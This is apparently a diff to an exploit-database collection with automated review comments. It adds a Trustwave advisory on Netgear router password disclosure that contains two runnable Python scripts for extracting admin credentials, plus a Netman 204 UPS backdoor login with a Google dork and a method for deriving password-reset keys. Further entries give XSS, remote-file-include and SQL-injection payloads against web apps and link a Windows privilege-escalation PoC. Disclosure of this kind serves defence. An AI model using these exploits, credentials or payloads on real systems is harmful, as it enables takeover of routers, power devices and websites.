# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
|
||||
# D6400 V1.0.0.34_1.3.34
|
||||
# D6400 V1.0.0.38_1.1.38
|
||||
# D6400 V1.0.0.22_1.0.22
|
||||
# DC112A V1.0.0.30_1.0.60 (Latest)
|
||||
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
|
||||
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
|
||||
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
|
||||
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
|
||||
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
|
||||
# R6300 V1.0.2.78_1.0.58 (Latest)
|
||||
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
|
||||
# R6300v2 V1.0.3.30_10.0.73
|
||||
# R6700 V1.0.1.14_10.0.29 (Latest beta)
|
||||
# R6700 V1.0.0.26_10.0.26 (Latest stable)
|
||||
# R6700 V1.0.0.24_10.0.18
|
||||
# R6900 V1.0.0.4_1.0.10 (Latest)
|
||||
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
|
||||
# R8300 V1.0.2.48_1.0.52
|
||||
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
|
||||
# R8500 V1.0.2.26_1.0.41
|
||||
# R8500 V1.0.0.56_1.0.28
|
||||
# R8500 V1.0.0.20_1.0.11
|
||||
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
|
||||
# VEGN2610 V1.0.0.29_1.0.29
|
||||
# VEGN2610 V1.0.0.27_1.0.27
|
||||
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
|
||||
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
|
||||
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
|
||||
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
|
||||
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
|
||||
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
|
||||
# WNDR4500v2 V1.0.0.42_1.0.25
|
||||
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
|
||||
# WGR614v10 V1.0.2.58_60.0.84NA
|
||||
# WGR614v10 V1.0.2.54_60.0.82NA
|
||||
# WN3100RP V1.0.0.14_1.0.19 (Latest)
|
||||
# WN3100RP V1.0.0.6_1.0.12
|
||||
|
||||
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
|
||||
# Lenovo R3220 V1.0.0.13_1.0.13
|
||||
|
||||
|
||||
Product description:
|
||||
Multiple Netgear Routers
|
||||
|
||||
Many Netgear routers are prone to password disclosure via simple crafted
|
||||
requests to the web management server. The bug is exploitable remotely if the
|
||||
remote management option is set and can also be exploited given access to the
|
||||
router over LAN or WLAN.
|
||||
|
||||
When trying to access the web panel a user is asked to authenticate, if the
|
||||
authentication is cancelled and password recovery is not enabled, the user is
|
||||
redirected to a page which exposes a password recovery token. If a user
|
||||
supplies the correct token to the page
|
||||
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
|
||||
enabled), they will receive the admin password for the router.
|
||||
|
||||
If password recovery is set the exploit will fail, as it will ask the user for the recovery
|
||||
questions which were previously set when enabling the feature, this is
|
||||
persistent, even after disabling the recovery option the exploit will fail,
|
||||
because the router will ask for the security questions.
|
||||
This can easily be reproduced using the attached poc, or by sending these two
|
||||
simple requests via the browser:
|
||||
1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token
|
||||
2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
|
||||
|
||||
## netgore.py
|
||||
import sys
|
||||
import requests
|
||||
|
||||
|
||||
def scrape(text, start_trig, end_trig):
|
||||
if text.find(start_trig) != -1:
|
||||
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
|
||||
else:
|
||||
return "i_dont_speak_english"
|
||||
#disable nasty insecure ssl warning
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
#1st stage - get token
|
||||
ip = sys.argv[1]
|
||||
port = sys.argv[2]
|
||||
url = 'http://' + ip + ':' + port + '/'
|
||||
try:
|
||||
r = requests.get(url)
|
||||
except:
|
||||
url = 'https://' + ip + ':' + port + '/'
|
||||
r = requests.get(url, verify=False)
|
||||
model = r.headers.get('WWW-Authenticate')
|
||||
if model is not None:
|
||||
print "Attcking: " + model[13:-1]
|
||||
else:
|
||||
print "not a netgear router"
|
||||
sys.exit(0)
|
||||
token = scrape(r.text, 'unauth.cgi?id=', '\"')
|
||||
if token == 'i_dont_speak_english':
|
||||
print "not vulnerable"
|
||||
sys.exit(0)
|
||||
print "token found: " + token
|
||||
#2nd stage - pass the token - get the password
|
||||
url = url + 'passwordrecovered.cgi?id=' + token
|
||||
r = requests.post(url, verify=False)
|
||||
#profit
|
||||
if r.text.find('left\">') != -1:
|
||||
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
|
||||
username = scrape(username, '>', '\'')
|
||||
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
|
||||
password = scrape(password, '>', '\'')
|
||||
if username == "i_dont_speak_english":
|
||||
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
|
||||
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
|
||||
else:
|
||||
print "not vulnerable becuse password recovery IS set"
|
||||
sys.exit(0)
|
||||
#html encoding pops out of nowhere, lets replace that
|
||||
password = password.replace("#","#")
|
||||
password = password.replace("&","&")
|
||||
print "user: " + username
|
||||
print "pass: " + password
|
||||
|
||||
================================
|
||||
Just run the PoC against a router to get the credentials if it is vulnerable.
|
||||
|
||||
|
||||
|
||||
Finding 2: Remote and Local Password Disclosure
|
||||
Credit: Simon Kenin of Trustwave SpiderLabs
|
||||
CVE: CVE-2017-5521
|
||||
|
||||
Version affected:
|
||||
|
||||
# AC1450 V1.0.0.34_10.0.16 (Latest)
|
||||
# AC1450 V1.0.0.22_1.0.10
|
||||
# AC1450 V1.0.0.14_1.0.6
|
||||
# D6300 V1.0.0.96_1.1.96 (Latest)
|
||||
# D6300B V1.0.0.36_1.0.36
|
||||
# D6300B V1.0.0.32_1.0.32
|
||||
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
|
||||
# D6400 V1.0.0.22_1.0.22
|
||||
# DC112A V1.0.0.30_1.0.60 (Latest)
|
||||
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
|
||||
# DGN2200v4 V1.0.0.66_1.0.66
|
||||
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
|
||||
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
|
||||
# R6200 V1.0.1.56_1.0.43 (Latest)
|
||||
# R6200 V1.0.1.52_1.0.41
|
||||
# R6200 V1.0.1.48_1.0.37
|
||||
# R6200v2 V1.0.3.10_10.1.10 (Latest)
|
||||
# R6200v2 V1.0.1.20_1.0.18
|
||||
# R6250 V1.0.4.6_10.1.12 (Latest beta)
|
||||
# R6250 V1.0.4.2_10.1.10 (Latest stable)
|
||||
# R6250 V1.0.1.84_1.0.78
|
||||
# R6300 V1.0.2.78_1.0.58 (Latest)
|
||||
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
|
||||
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
|
||||
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
|
||||
# R6700 V1.0.0.26_10.0.26 (Latest)
|
||||
# R6700 V1.0.0.24_10.0.18
|
||||
# R6900 V1.0.0.4_1.0.10 (Latest)
|
||||
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
|
||||
# R7000 V1.0.4.30_1.1.67
|
||||
# R7900 V1.0.1.8_10.0.14 (Latest beta)
|
||||
# R7900 V1.0.1.4_10.0.12 (Latest stable)
|
||||
# R7900 V1.0.0.10_10.0.7
|
||||
# R7900 V1.0.0.8_10.0.5
|
||||
# R7900 V1.0.0.6_10.0.4
|
||||
# R8000 V1.0.3.26_1.1.18 (Latest beta)
|
||||
# R8000 V1.0.3.4_1.1.2 (Latest stable)
|
||||
# R8300 V1.0.2.48_1.0.52
|
||||
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
|
||||
# R8500 V1.0.2.30_1.0.43
|
||||
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
|
||||
# VEGN2610 V1.0.0.27_1.0.27
|
||||
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
|
||||
# VEVG2660 V1.0.0.23_1.0.23
|
||||
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
|
||||
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
|
||||
# WNDR3400v3 V1.0.1.2_1.0.51
|
||||
# WNDR3400v3 V1.0.0.22_1.0.29
|
||||
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
|
||||
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
|
||||
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
|
||||
# WNDR4500 V1.0.1.6_1.0.24
|
||||
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
|
||||
# WNDR4500v2 V1.0.0.50_1.0.30
|
||||
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
|
||||
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
|
||||
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
|
||||
# WNR3500Lv2 V1.2.0.32_40.0.74
|
||||
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
|
||||
# WGR614v10 V1.0.2.58_60.0.84NA
|
||||
# WGR614v10 V1.0.2.54_60.0.82NA
|
||||
|
||||
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
|
||||
# Lenovo R3220 V1.0.0.13_1.0.13
|
||||
|
||||
|
||||
Many Netgear routers are prone to password disclosure via simple crafted
|
||||
request to the web management server. The bug is exploitable remotely if the
|
||||
remote management option is set and can also be exploited given access to the
|
||||
router over LAN or WLAN.
|
||||
|
||||
Netgear routers have an option to restore forgotten password via 2 security
|
||||
questions. If the recovery option is disabled (which is the default), it is
|
||||
still possible to recover the password by sending a correct token to the
|
||||
recovery page.
|
||||
|
||||
If a user supplies the correct token to the page
|
||||
http://router/passwordrecovered.cgi?id=TOKEN (and password recovery is not
|
||||
enabled), they will receive the admin password for the router. If password
|
||||
recovery is set the exploit will fail, as it will ask the user for the recovery
|
||||
questions which were previously set when enabling the feature, this is
|
||||
persistent, even after disabling the recovery option, the exploit will fail,
|
||||
because the router will ask for the security questions.
|
||||
|
||||
This mechanism does not work correctly on the very first request to
|
||||
"passwordrecovered.cgi" and the token is not properly checked, this means that
|
||||
any TOKEN value will result in disclosure of the password.
|
||||
The issue occurs after every reboot of the router.
|
||||
|
||||
This can easily be reproduced using the attached poc, or by sending a simple
|
||||
request via the browser:
|
||||
1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
|
||||
|
||||
## netgore2.py
|
||||
import sys
|
||||
import requests
|
||||
|
||||
def scrape(text, start_trig, end_trig):
|
||||
if text.find(start_trig) != -1:
|
||||
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
|
||||
else:
|
||||
return "i_dont_speak_english"
|
||||
#disable nasty insecure ssl warning
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
#1st stage
|
||||
ip = sys.argv[1]
|
||||
port = sys.argv[2]
|
||||
url = 'http://' + ip + ':' + port + '/'
|
||||
try:
|
||||
r = requests.get(url)
|
||||
except:
|
||||
url = 'https://' + ip + ':' + port + '/'
|
||||
r = requests.get(url, verify=False)
|
||||
model = r.headers.get('WWW-Authenticate')
|
||||
if model is not None:
|
||||
print "Attcking: " + model[13:-1]
|
||||
else:
|
||||
print "not a netgear router"
|
||||
sys.exit(0)
|
||||
#2nd stage
|
||||
url = url + 'passwordrecovered.cgi?id=get_rekt'
|
||||
try:
|
||||
r = requests.post(url, verify=False)
|
||||
except:
|
||||
print "not vulnerable router"
|
||||
sys.exit(0)
|
||||
#profit
|
||||
if r.text.find('left\">') != -1:
|
||||
username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
|
||||
username = scrape(username, '>', '\'')
|
||||
password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
|
||||
password = scrape(password, '>', '\'')
|
||||
if username == "i_dont_speak_english":
|
||||
username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
|
||||
password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
|
||||
else:
|
||||
print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
|
||||
sys.exit(0)
|
||||
#html encoding pops out of nowhere, lets replace that
|
||||
password = password.replace("#","#")
|
||||
password = password.replace("&","&")
|
||||
print "user: " + username
|
||||
print "pass: " + password
|
||||
|
||||
================================
|
||||
Just run the PoC against a router to get the credentials if it is vulnerable.
|
||||
|
||||
|
||||
|
||||
|
||||
Remediation Steps:
|
||||
Please see NETGEAR's KBA for list of firmware patches for various models. As a
|
||||
workaround, the bug only works when password recovery is NOT set. If you do set
|
||||
password recovery this is not exploitable.
|
||||
|
||||
Revision History:
|
||||
04/06/2016 - Vulnerability disclosed to vendor
|
||||
04/19/2016 - Request for update and received confirmation of receipt of the advisories
|
||||
05/18/2016 - Request for update; no response
|
||||
07/14/2016 - Request for update
|
||||
07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage
|
||||
10/17/2016 - Request for update
|
||||
12/15/2016 - Notice of intent to publish advisories
|
||||
01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd
|
||||
01/30/2017 - Advisory published
|
||||
|
||||
|
||||
References
|
||||
1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
|
||||
2. https://www.exploit-db.com/exploits/32883/
|
||||
3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
|
||||
|
||||
|
||||
About Trustwave:
|
||||
Trustwave is the leading provider of on-demand and subscription-based
|
||||
information security and payment card industry compliance management
|
||||
solutions to businesses and government entities throughout the world. For
|
||||
organizations faced with today's challenging data security and compliance
|
||||
environment, Trustwave provides a unique approach with comprehensive
|
||||
solutions that include its flagship TrustKeeper compliance management
|
||||
software and other proprietary security solutions. Trustwave has helped
|
||||
thousands of organizations--ranging from Fortune 500 businesses and large
|
||||
financial institutions to small and medium-sized retailers--manage
|
||||
compliance and secure their network infrastructure, data communications and
|
||||
critical information assets. Trustwave is headquartered in Chicago with
|
||||
offices throughout North America, South America, Europe, Africa, China and
|
||||
Australia. For more information, visit https://www.trustwave.com
|
||||
|
||||
About Trustwave SpiderLabs:
|
||||
SpiderLabs(R) is the advanced security team at Trustwave focused on
|
||||
application security, incident response, penetration testing, physical
|
||||
security and security research. The team has performed over a thousand
|
||||
incident investigations, thousands of penetration tests and hundreds of
|
||||
application security tests globally. In addition, the SpiderLabs Research
|
||||
team provides intelligence through bleeding-edge research and proof of
|
||||
concept tool development to enhance Trustwave's products and services.
|
||||
https://www.trustwave.com/spiderlabs
|
||||
|
||||
Disclaimer:
|
||||
The information provided in this advisory is provided "as is" without
|
||||
warranty of any kind. Trustwave disclaims all warranties, either express or
|
||||
implied, including the warranties of merchantability and fitness for a
|
||||
particular purpose. In no event shall Trustwave or its suppliers be liable
|
||||
for any damages whatsoever including direct, indirect, incidental,
|
||||
consequential, loss of business profits or special damages, even if
|
||||
Trustwave or its suppliers have been advised of the possibility of such
|
||||
damages. Some states do not allow the exclusion or limitation of liability
|
||||
for consequential or incidental damages so the foregoing limitation may not
|
||||
apply.
|
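Review bot: the file is added as platforms/hardware/webapps/41205.py, but its 358 lines are the full text of advisory TWSL2017-003 with two scripts (netgore.py, netgore2.py) embedded between prose sections, so it will not parse as Python; store it as .txt or split the scripts out. Finding 1 and Finding 2 also share the same heading ("Remote and Local Password Disclosure") and the same CVE line, which makes them hard to tell apart in an index. A one-line subtitle per finding (token exposed via unauth.cgi, versus token not checked on the first request after a reboot) would help anyone matching this entry against the NETGEAR KBA in reference 3. For operators, the Remediation Steps paragraph is the part worth surfacing near the top: firmware patches per the KBA, and setting password recovery as the workaround.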
45
platforms/hardware/webapps/41208.txt
Executable file
|
@ -0,0 +1,45 @@
|
|||
# Exploit Title: Netman 204 Backdoor and weak password recovery function
|
||||
# Google Dork: intitle:"Netman 204 login"
|
||||
# Date: 31st Jan 2017
|
||||
# Exploit Author: Simon Gurney
|
||||
# Vendor Homepage: blog.synack.co.uk
|
||||
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
|
||||
# Version: S14-1 and S15-2
|
||||
# Tested on: Reillo UPS
|
||||
# CVE : N/A
|
||||
|
||||
Netman 204 cards have a backdoor account eurek:eurek.
|
||||
|
||||
This account can be logged with by simply browsing to the URL
|
||||
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
|
||||
or
|
||||
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
|
||||
|
||||
Due to flaws in parameter validation, the URL can be shortened to:
|
||||
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
|
||||
or
|
||||
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
|
||||
|
||||
This backdoor has previously been reported by Saeed reza Zamanian under EDB-ID: 40431 here<https://www.exploit-db.com/exploits/40431/>, which shows how to utilise this to gain shell access however this did not give detail of how easy it is to log in to the device and access the administrative functions via the web interface. The google dork provided also reveals some UPS exposed to the internet.
|
||||
|
||||
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:
|
||||
|
||||
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
|
||||
KEY=`echo .$NETMANID | md5sum | cut -c2-10`
|
||||
|
||||
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
|
||||
Such as,
|
||||
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
|
||||
Then take characters 2-10, where position 1 is character 1 (not 0).
|
||||
Such as,
|
||||
354a65581
|
||||
|
||||
Then browse to the url:
|
||||
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
|
||||
or
|
||||
https://[ip]/cgi-bin/recover2.cgi?password=354a65581
|
||||
|
||||
|
||||
Passwords have now been reset.
|
||||
|
||||
|
|
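Review bot: in the header block, "Vendor Homepage: blog.synack.co.uk" does not look like the vendor's site given that the Software Link points to riello-ups.co.uk, and "Tested on: Reillo UPS" spells the name differently from that link; please confirm both. The entry also ends at "Passwords have now been reset." with no mitigation line. Since the text says the reset key is derived from the MAC address and the Google dork line notes that some cards are exposed to the internet, a short closing note that the management interface should not be reachable from untrusted networks would make the entry useful to operators.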
@ -8,5 +8,4 @@ This may facilitate the theft of cookie-based authentication credentials as well
|
|||
|
||||
JAWS versions 0.4 and 0.5 and subsequent are reportedly vulnerable.
|
||||
|
||||
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script
|
||||
src=some script</script>
|
||||
http://www.example.com/index.php?gadget=Glossary&action=ViewTerm&term=<script src=some script</script>
|
|
@ -4,5 +4,4 @@ JAWS is prone to a remote file include vulnerability. This issue is due to a fai
|
|||
|
||||
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
|
||||
|
||||
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=
|
||||
http://www.example.com
|
||||
http://www.example.com/[path]/gadgets/Blog/BlogModel.php?path=http://www.example.com
|
|
@ -1,7 +1,6 @@
|
|||
# Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection
|
||||
# Exploit Title: WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection
|
||||
# Exploit Author: Lenon Leite
|
||||
# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
|
||||
|
||||
# Software Link: https://wordpress.org/plugins/wp-email-users/
|
||||
# Contact: http://twitter.com/lenonleite
|
||||
# Website: http://lenonleite.com.br/
|
||||
|
@ -11,7 +10,7 @@
|
|||
|
||||
1 - Description:
|
||||
|
||||
Type user access: is accessible for any registered user
|
||||
Type user access: is accessible for any registered user
|
||||
|
||||
$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection
|
||||
|
||||
|
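Review bot: the description line "$_REQUEST[‘edit’] is escaped wrong" names a parameter that does not appear in the proof-of-concept form further down, which posts action, filetitle and temp_sel_key. Together with the title fix in the first hunk (the old title named WP Private Messages 1.0.1), this looks like text carried over from another entry; the description should name the parameter that is actually unsanitised in WP Email Users 1.4.1. The curly quotes around edit should be plain ASCII quotes as well.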
@ -24,15 +23,14 @@ http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wor
|
|||
2 – Using:
|
||||
|
||||
<form action="http://localhost:8080/wp-admin/admin-ajax.php" method="post">
|
||||
<input type="text" name="action" value="weu_my_action">
|
||||
<input type="text" name="filetitle" value="0 UNION SELECT
|
||||
CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
|
||||
<input type="text" name="temp_sel_key" value="select_temp">
|
||||
<input type="submit" name="">
|
||||
<input type="text" name="action" value="weu_my_action">
|
||||
<input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
|
||||
<input type="text" name="temp_sel_key" value="select_temp">
|
||||
<input type="submit" name="">
|
||||
</form>
|
||||
|
||||
|
||||
3 - Timeline:
|
||||
|
||||
- 12/01/2016 – Discovered
|
||||
- 13/12/2016 – Vendor not finded
|
||||
12/01/2016 – Discovered
|
||||
13/12/2016 – Vendor not finded
|
||||
|
|
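Review bot: the timeline at the end of this hunk is ambiguous. "12/01/2016 – Discovered" followed by "13/12/2016 – Vendor not finded" only reads consistently as DD/MM/YYYY, which puts eleven months between the two entries, while the blog URL in the hunk header is dated 2017/01/17. Use ISO dates (YYYY-MM-DD), confirm the years, and reword the second entry (for example "Vendor could not be contacted") so readers can tell whether the plugin author was ever notified.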
18
platforms/php/webapps/41204.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 30.01.2017
|
||||
# Vendor Homepage: http://itechscripts.com/
|
||||
# Software Buy: http://itechscripts.com/video-sharing-script/
|
||||
# Demo: http://video-sharing.itechscripts.com/
|
||||
# Version: 4.94
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/channels.php?uid=[SQL]
|
||||
# E.t.c
|
||||
# # # # #
|
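Review bot: the only technical content is "channels.php?uid=[SQL]" followed by "E.t.c", which leaves it unclear whether other pages or parameters are affected. Either list them or drop the "E.t.c" line, and add a line on vendor notification or fix status; as written, a site owner running version 4.94 cannot tell what to check or whether a fixed release exists.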
23
platforms/windows/local/41207.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: Viscosity for Windows 1.6.7 Privilege Escalation
|
||||
# Date: 31.01.2017
|
||||
# Software Link: https://www.sparklabs.com/
|
||||
# Exploit Author: Kacper Szurek
|
||||
# Contact: https://twitter.com/KacperSzurek
|
||||
# Website: https://security.szurek.pl/
|
||||
# Category: local
|
||||
|
||||
1. Description
|
||||
|
||||
It is possible to execute openvpn with custom dll as SYSTEM using ViscosityService because path is not correctly validated.
|
||||
|
||||
https://security.szurek.pl/viscosity-for-windows-167-privilege-escalation.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41207.zip
|
||||
|
||||
3. Solution
|
||||
|
||||
Update to version 1.6.8
|
||||
|
||||
https://www.sparklabs.com/blog/viscosity-for-mac-windows-version-1-6-8/
|
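Review bot: section 2 (Proof of Concept) is only a link to 41207.zip in the exploit-database-bin-sploits repository, with no checksum recorded in this file. Add a SHA-256 of the archive next to the link so that anyone fetching it later can verify it is the file that was reviewed. The Solution section is clear (update to version 1.6.8); it would also help to state whether versions before 1.6.7 are affected, since the title names only 1.6.7.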